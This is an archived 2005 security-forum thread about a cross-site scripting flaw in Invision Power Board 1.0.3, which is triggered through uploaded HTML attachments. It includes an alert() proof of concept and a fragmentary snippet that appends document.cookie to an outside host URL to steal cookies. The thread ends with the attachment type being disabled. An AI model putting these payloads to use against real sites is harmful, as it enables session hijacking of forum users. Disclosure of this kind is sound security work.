JustAsFire
Aug 7 2005, 06:57 PM
QUOTE
the css found when you uploading a file to the server by the "atteched file" function..
in ipb you can upload some HTML file,in the html file write this:
CODE
<html>
<body>
<script>alert('Css found By V[i]RuS');</script>
</body>
</html>
when someone will click on the attechment file the script will run.
sry about my poor english..
bug discoverd V[i]RuS
tested succesfully on ipb 1.0.3 all the vers should be vuln =]
JustAsFire
Aug 7 2005, 07:34 PM
should I remove this till gsecur denies the .htm .html and .shtml attachments?
no, i dont think you should
this is now public,and this is a security board,your post is security related
so i think it should stay,anyway its not a critical sql injection vuln is it ?!
JustAsFire
Aug 7 2005, 07:46 PM
I think it could get your cookie.
usch
Aug 7 2005, 08:58 PM
that trick doesn't work with firefox. only with IE
usch
brOmstar
Aug 7 2005, 09:40 PM
I use the latest firefox and it works, open the attachment and a javascript alert box will be opened.
@usch this has nothing todo with the browser, as long as the browser knows javascript it will work. You download a html file with javascript inside and execute it on your browser so it doesn't depend on the browser. The bug here is that you can inject javascript code into the attachment.
apoc_neo
Aug 7 2005, 09:43 PM
This can be avoided, just simply disable javascript in internet explorer or mozilla
lobas
Aug 7 2005, 10:26 PM
how can we use this malicously
<body>
<script>'http://host.info:80/'+document.cookie;</script>
</body>
</html>
usch
Aug 7 2005, 10:31 PM
what do you mean with maliciously ?
usch
lobas
Aug 7 2005, 10:49 PM
steal cookies?
M3X!C4N
Aug 8 2005, 12:20 AM
Learn javascript and then you will find out
lobas
Aug 8 2005, 12:25 AM
i actually know how to do it but im not setting uo test forum
do u even know ur self or u being smart comment boy
M3X!C4N
Aug 8 2005, 03:32 AM
Woah sory there I though you were just asking what the script was to steal a cookie
Booster2ooo
Aug 8 2005, 07:28 AM
Should be interessting but I don't know even how to attach a file on IPB ... never found the button
JustAsFire
Aug 8 2005, 07:31 AM
QUOTE(Booster2ooo @ Aug 8 2005, 07:28 AM)
Should be interessting but I don't know even how to attach a file on IPB ... never found the button
at least you're honest
Booster2ooo
Aug 8 2005, 07:51 AM
Used to use vbb, donno well IPB, and, really, i don't know how to do this shit, somebody can explian to me ? ( year year ... noob, but i don't find any way were are the attachement case or button)
GSecur
Aug 8 2005, 10:51 AM
Attachment type disabled.
tweakz20
Aug 9 2005, 07:03 PM
Just to let you know, 2.0 onwards is not vulnerable.
Tiago2
Aug 11 2005, 02:16 PM
Interesting. Tried it aswell with the only javascript i know. alert(document.cookie).
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
